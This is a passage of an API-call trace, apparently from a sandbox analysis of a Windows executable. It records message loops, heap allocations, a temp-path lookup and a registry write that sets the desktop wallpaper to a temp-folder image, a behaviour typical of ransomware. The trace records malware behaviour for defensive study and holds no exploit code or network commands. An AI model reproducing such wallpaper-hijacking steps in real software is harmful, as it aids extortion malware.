(hWnd=0x60122, uIDEvent=0x1) returned 1 [0312.250] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0312.250] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.250] Sleep (dwMilliseconds=0xa) [0312.267] timeGetTime () returned 0x4df45 [0312.267] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.267] Sleep (dwMilliseconds=0xa) [0312.282] timeGetTime () returned 0x4df55 [0312.282] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.282] Sleep (dwMilliseconds=0xa) [0312.297] timeGetTime () returned 0x4df65 [0312.297] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.297] Sleep (dwMilliseconds=0xa) [0312.312] timeGetTime () returned 0x4df74 [0312.312] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.313] Sleep (dwMilliseconds=0xa) [0312.328] timeGetTime () returned 0x4df84 [0312.328] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.328] Sleep (dwMilliseconds=0xa) [0312.344] timeGetTime () returned 0x4df93 [0312.344] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.344] Sleep (dwMilliseconds=0xa) [0312.359] timeGetTime () returned 0x4dfa3 [0312.359] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.359] Sleep (dwMilliseconds=0xa) [0312.375] timeGetTime () returned 0x4dfb3 [0312.375] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.375] Sleep (dwMilliseconds=0xa) [0312.390] timeGetTime () returned 0x4dfc2 [0312.390] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.390] Sleep (dwMilliseconds=0xa) [0312.406] timeGetTime () returned 0x4dfd2 [0312.406] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.406] Sleep (dwMilliseconds=0xa) [0312.424] timeGetTime () returned 0x4dfe1 [0312.424] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.424] Sleep (dwMilliseconds=0xa) [0312.438] timeGetTime () returned 0x4dff1 [0312.438] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.438] Sleep (dwMilliseconds=0xa) [0312.453] timeGetTime () returned 0x4e001 [0312.453] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.453] Sleep (dwMilliseconds=0xa) [0312.480] timeGetTime () returned 0x4e010 [0312.480] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.480] Sleep (dwMilliseconds=0xa) [0312.484] timeGetTime () returned 0x4e020 [0312.484] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.484] Sleep (dwMilliseconds=0xa) [0312.500] timeGetTime () returned 0x4e02f [0312.500] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.500] Sleep (dwMilliseconds=0xa) [0312.515] timeGetTime () returned 0x4e03f [0312.515] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.515] Sleep (dwMilliseconds=0xa) [0312.532] timeGetTime () returned 0x4e04f [0312.532] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.532] Sleep (dwMilliseconds=0xa) [0312.546] timeGetTime () returned 0x4e05e [0312.546] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.546] Sleep (dwMilliseconds=0xa) [0312.562] timeGetTime () returned 0x4e06e [0312.562] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.562] Sleep (dwMilliseconds=0xa) [0312.578] timeGetTime () returned 0x4e07d [0312.578] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.578] Sleep (dwMilliseconds=0xa) [0312.594] timeGetTime () returned 0x4e08d [0312.594] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.594] Sleep (dwMilliseconds=0xa) [0312.609] timeGetTime () returned 0x4e09d [0312.609] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.609] Sleep (dwMilliseconds=0xa) [0312.624] timeGetTime () returned 0x4e0ac [0312.625] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.625] Sleep (dwMilliseconds=0xa) [0312.640] timeGetTime () returned 0x4e0bc [0312.640] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.640] Sleep (dwMilliseconds=0xa) [0312.656] timeGetTime () returned 0x4e0cb [0312.656] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.656] Sleep (dwMilliseconds=0xa) [0312.671] timeGetTime () returned 0x4e0db [0312.671] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.671] Sleep (dwMilliseconds=0xa) [0312.687] timeGetTime () returned 0x4e0eb [0312.687] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.687] Sleep (dwMilliseconds=0xa) [0312.713] timeGetTime () returned 0x4e0fa [0312.713] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.713] Sleep (dwMilliseconds=0xa) [0312.718] timeGetTime () returned 0x4e10a [0312.718] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.718] Sleep (dwMilliseconds=0xa) [0312.733] timeGetTime () returned 0x4e119 [0312.734] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.734] Sleep (dwMilliseconds=0xa) [0312.751] timeGetTime () returned 0x4e129 [0312.751] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.751] Sleep (dwMilliseconds=0xa) [0312.765] timeGetTime () returned 0x4e139 [0312.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0312.765] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0312.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0312.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0312.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0312.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0312.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0312.767] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0312.767] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0312.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0312.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0312.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0312.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0312.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0312.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0312.769] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0312.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0312.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0312.769] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0312.769] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0312.769] RegCloseKey (hKey=0x294) returned 0x0 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0312.770] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0312.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0312.770] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0312.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0312.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0312.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0312.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0312.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0312.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0312.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0312.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0312.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0312.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0312.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0312.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0312.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0312.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0312.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0312.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0312.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0312.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0312.773] 